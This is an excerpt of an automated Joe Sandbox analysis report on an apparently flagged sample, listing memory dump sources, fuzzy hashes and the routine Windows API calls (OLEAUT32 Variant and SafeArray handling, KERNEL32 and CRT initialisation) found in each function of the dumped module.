                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
                                            • Instruction ID: 589e18091f851ade225a8b67c6930ef248af1dcd4c30146a89cf878ffb7daba9
                                            • Opcode Fuzzy Hash: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
                                            • Instruction Fuzzy Hash: 8511B93670AB420BF304DE3EE840493B7A3AFDD31877A85AEA458DF646C771E456C681
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 618cd92e082c6e0df28920888a12f1d00b1dc3018dff1bec849b5f0686b3fbf6
                                            • Instruction ID: c69e80e111ca49b629b2de5eb98ec3fb4727bc3e574f7e7947cf76c570aed43d
                                            • Opcode Fuzzy Hash: 618cd92e082c6e0df28920888a12f1d00b1dc3018dff1bec849b5f0686b3fbf6
                                            • Instruction Fuzzy Hash: 6C21AAB4D052189FCB10CFA9D584AEEBBF1BB49310F24906AE818B7350D735A945CFA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60d1938a5fcc4fca0b3ee7570dd979ac6a151c70939799c16b2b10cbb9d5ed91
                                            • Instruction ID: 1cd1e78f1afc822d43875042622efd9e354a1197dafa933761db6586f65c96a0
                                            • Opcode Fuzzy Hash: 60d1938a5fcc4fca0b3ee7570dd979ac6a151c70939799c16b2b10cbb9d5ed91
                                            • Instruction Fuzzy Hash: CF21AAB4D012089FCB10CFA9D584ADEFBF4BB49310F24906AE818B7350D735A945CFA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26ef9a0bb7b77aa355f4ca316dbe0a75b8f8ab0b71a910e74491ff77f5c62e3e
                                            • Instruction ID: 94f6c9e85e2d80f2712eb54f97333a958e1b79aa47c08b01e731c18d9817ec5d
                                            • Opcode Fuzzy Hash: 26ef9a0bb7b77aa355f4ca316dbe0a75b8f8ab0b71a910e74491ff77f5c62e3e
                                            • Instruction Fuzzy Hash: 54115E72A08609EFC714CF59D841799FBF5FB45724F20862EE81993B80D735A900CB90
                                            APIs
                                            • operator+.LIBCMT ref: 6CF06FCC
                                              • Part of subcall function 6CF04147: DName::DName.LIBCMT ref: 6CF0415A
                                              • Part of subcall function 6CF04147: DName::operator+.LIBCMT ref: 6CF04161
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: NameName::Name::operator+operator+
                                            • String ID:
                                            • API String ID: 2937105810-0
                                            • Opcode ID: e5e5ad9e3f5497ee3b2c9cb86798e197c6fd4f718015d189e7d4af0854ad52be
                                            • Instruction ID: 4da9987cdd20de40fbc69e50438c251b0d469ceaec487447c184394ed5121219
                                            • Opcode Fuzzy Hash: e5e5ad9e3f5497ee3b2c9cb86798e197c6fd4f718015d189e7d4af0854ad52be
                                            • Instruction Fuzzy Hash: 62D12CB5B00209AFDF10DFA8C8A1EEEBBF5AF08B04F10415AE515E7790DB359A49DB50
                                            APIs
                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFECA5
                                            • __mtterm.LIBCMT ref: 6CEFECB1
                                              • Part of subcall function 6CEFE97C: DecodePointer.KERNEL32(00000012,6CEFA397,6CEFA37D,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFE98D
                                              • Part of subcall function 6CEFE97C: TlsFree.KERNEL32(0000000A,6CEFA397,6CEFA37D,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFE9A7
                                              • Part of subcall function 6CEFE97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6CEFA397,6CEFA37D,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CF02325
                                              • Part of subcall function 6CEFE97C: DeleteCriticalSection.KERNEL32(0000000A,?,?,6CEFA397,6CEFA37D,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CF0234F
                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CEFECC7
                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CEFECD4
                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CEFECE1
                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CEFECEE
                                            • TlsAlloc.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED3E
                                            • TlsSetValue.KERNEL32(00000000,?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED59
                                            • __init_pointers.LIBCMT ref: 6CEFED63
                                            • EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED74
                                            • EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED81
                                            • EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED8E
                                            • EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED9B
                                            • DecodePointer.KERNEL32(Function_0006EB00,?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFEDBC
                                            • __calloc_crt.LIBCMT ref: 6CEFEDD1
                                            • DecodePointer.KERNEL32(00000000,?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFEDEB
                                            • GetCurrentThreadId.KERNEL32 ref: 6CEFEDFD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                            • API String ID: 1868149495-3819984048
                                            • Opcode ID: 3efa3e9a99891ab777539f6aaa29d7092df5ba25af4c6c4d87987da1a8e219b9
                                            • Instruction ID: 4dc220400914270d2c439c0853f5e39e502329031d3f053ed4c89fceaa9c439e
                                            • Opcode Fuzzy Hash: 3efa3e9a99891ab777539f6aaa29d7092df5ba25af4c6c4d87987da1a8e219b9
                                            • Instruction Fuzzy Hash: EE319131E20724AFEFA1BF759C057553FB6F746628B35062AE47897A90DB319402CBE0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove$Xinvalid_argumentstd::_
                                            • String ID: invalid string position$string too long
                                            • API String ID: 1771113911-4289949731
                                            • Opcode ID: 69d3ca9a2f3425b20e6e969bf55ca994924e6d777de0d3bef9f64af3143f8e7d
                                            • Instruction ID: 3213ca1efb784ae5feb3acb68d8e267138e39d555a8bd79dcf0e1b8d7667e5a7
                                            • Opcode Fuzzy Hash: 69d3ca9a2f3425b20e6e969bf55ca994924e6d777de0d3bef9f64af3143f8e7d
                                            • Instruction Fuzzy Hash: 73B14A71310144DFDB28CE9CCDD1A9E73B6EB86754728491DE892CFB81C634E8478BA2
                                            APIs
                                            • UnDecorator::getBasicDataType.LIBCMT ref: 6CF07FFF
                                            • DName::operator=.LIBCMT ref: 6CF08013
                                            • DName::operator+=.LIBCMT ref: 6CF08021
                                            • UnDecorator::getPtrRefType.LIBCMT ref: 6CF0804D
                                            • UnDecorator::getDataIndirectType.LIBCMT ref: 6CF080CA
                                            • UnDecorator::getBasicDataType.LIBCMT ref: 6CF080D3
                                            • operator+.LIBCMT ref: 6CF08166
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                            • String ID: std::nullptr_t$volatile
                                            • API String ID: 2203807771-3726895890
                                            • Opcode ID: 5bd798e9fbb27d8f0b24eef48cd9b5d3926987b103ec4fcec61ea7ed2ece470f
                                            • Instruction ID: 057fc0dcd8c0ed2f4bf5639645a348a62472a0c042435d245cc0be3fc6d9f00a
                                            • Opcode Fuzzy Hash: 5bd798e9fbb27d8f0b24eef48cd9b5d3926987b103ec4fcec61ea7ed2ece470f
                                            • Instruction Fuzzy Hash: 7441E272B04108FFCF209F54C861AEEBB75FF02B49F118167E95857A52C7319A46EB90
                                            APIs
                                            • VariantInit.OLEAUT32(6CF105A8), ref: 6CEB49EE
                                            • VariantInit.OLEAUT32(?), ref: 6CEB49F7
                                            • VariantInit.OLEAUT32(?), ref: 6CEB49FD
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB4A08
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB4A39
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4A45
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB4B66
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4B76
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4B7C
                                            • VariantClear.OLEAUT32(6CF105A8), ref: 6CEB4B82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID: 1l$1l
                                            • API String ID: 2515392200-1092580327
                                            • Opcode ID: 81b0bacbda661baf60960b248d2dbee85f9b43e5daa98e3a7a925c017077bd04
                                            • Instruction ID: 23fe795988c82adc0084c0af86d342ef15c215f8a12ec1800e48aeb3501f2463
                                            • Opcode Fuzzy Hash: 81b0bacbda661baf60960b248d2dbee85f9b43e5daa98e3a7a925c017077bd04
                                            • Instruction Fuzzy Hash: 9E515F72A00219AFDB04DFA4CC84EBEBBB8FF89314F144169E915AB744D774A901CBA0
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB4BDC
                                            • VariantInit.OLEAUT32(?), ref: 6CEB4BE5
                                            • VariantInit.OLEAUT32(?), ref: 6CEB4BEB
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB4BF6
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB4C2A
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4C37
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB5107
                                            • VariantClear.OLEAUT32(?), ref: 6CEB5117
                                            • VariantClear.OLEAUT32(?), ref: 6CEB511D
                                            • VariantClear.OLEAUT32(?), ref: 6CEB5123
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID: 2l
                                            • API String ID: 2515392200-408751688
                                            • Opcode ID: 7c0209b8357d2802b8873ba7ed0dcbadb0712048c84cc1e2eb77c9f23fc6bd87
                                            • Instruction ID: 4a285f2d43e0dcca036dbfc8925b6dfa15b2b694f3890f3fe93c475042db668f
                                            • Opcode Fuzzy Hash: 7c0209b8357d2802b8873ba7ed0dcbadb0712048c84cc1e2eb77c9f23fc6bd87
                                            • Instruction Fuzzy Hash: 0712E575A15705AFC758DB98DD84DAAB3B9BF8D300F14466CF50AABB91CA30F841CB50
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEAFA0F
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAFA22
                                            • SafeArrayGetElement.OLEAUT32 ref: 6CEAFA5A
                                              • Part of subcall function 6CEB3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
                                              • Part of subcall function 6CEB3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83
                                              • Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
                                              • Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
                                              • Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                              • Part of subcall function 6CEADFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEADFF6
                                              • Part of subcall function 6CEADFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAE003
                                              • Part of subcall function 6CEADFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEAE02F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy$Element
                                            • String ID: RS7m$RS{m
                                            • API String ID: 959723449-144615663
                                            • Opcode ID: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
                                            • Instruction ID: e807dd65f7b2a4dd0251bc38f1f7b5e196f4982b60dee9c56f1701ce478d1ba1
                                            • Opcode Fuzzy Hash: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
                                            • Instruction Fuzzy Hash: 3AC16E70A01205AFDB14CFA8CD84FADB7B9AF89308F304198E945EB786DB75E945CB50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Init$Clear$Copy
                                            • String ID:
                                            • API String ID: 3833040332-0
                                            • Opcode ID: b133a9d2335ccaa0e7c8cb73d4b8bc3be0d5abe82f8d95634d3aceedbb77eaa2
                                            • Instruction ID: bbbffa1d455edb0a1cb628b804d9cc1bbd11180df28d6a089e63309fc477a183
                                            • Opcode Fuzzy Hash: b133a9d2335ccaa0e7c8cb73d4b8bc3be0d5abe82f8d95634d3aceedbb77eaa2
                                            • Instruction Fuzzy Hash: 2C818EB1901219AFDB04DFA8C981FEEBBB9BF49308F24415DE505AB740DB34E905CB90
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEBD8EC
                                            • VariantInit.OLEAUT32 ref: 6CEBD902
                                            • VariantInit.OLEAUT32(?), ref: 6CEBD90D
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBD929
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEBD966
                                            • VariantClear.OLEAUT32(?), ref: 6CEBD973
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEBD9B4
                                            • VariantClear.OLEAUT32(?), ref: 6CEBD9C1
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBDA6F
                                            • VariantClear.OLEAUT32(?), ref: 6CEBDA80
                                            • VariantClear.OLEAUT32(?), ref: 6CEBDA87
                                            • VariantClear.OLEAUT32(?), ref: 6CEBDA99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 1625659656-0
                                            • Opcode ID: ab737afa7720999135b5a2cd1619ab4454a5b268a3cdcb0aa756dfcd7b686b77
                                            • Instruction ID: 018ae4212c2a4a0909623060210716880f5c53e5ad4a16fec8b8403a894cd41b
                                            • Opcode Fuzzy Hash: ab737afa7720999135b5a2cd1619ab4454a5b268a3cdcb0aa756dfcd7b686b77
                                            • Instruction Fuzzy Hash: 568146766083019FC700CF64C844B5ABBF4BFC9728F158A5DE9989B744E774EA05CB92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
